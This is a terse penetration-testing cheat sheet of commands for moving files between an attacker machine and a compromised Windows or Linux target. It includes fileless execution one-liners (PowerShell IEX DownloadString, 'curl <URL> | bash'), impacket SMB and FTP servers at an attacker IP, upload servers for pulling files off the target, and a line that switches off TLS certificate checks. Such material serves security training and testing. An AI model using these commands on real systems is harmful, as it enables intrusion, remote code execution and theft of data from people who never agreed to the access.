# On Attacker (Linux)
cat file | base64 -w 0
# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))
# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')
# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')
# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile># On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support
# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe
# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write
# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')
# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')# Encode
cat file | base64 -w 0; echo
# Decode
echo -n '<base64_string>' | base64 -d > file
# Verify
md5sum file# Wget
wget <URL> -O /path/to/file
# cURL
curl -o /path/to/file <URL>
# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure
# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh
# Download
scp username@<IP>:/remote/file /local/directory
# Upload
scp /local/file username@<IP>:/remote/directory# Python3
python3 -m http.server
# PHP
php -S 0.0.0.0:8000[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}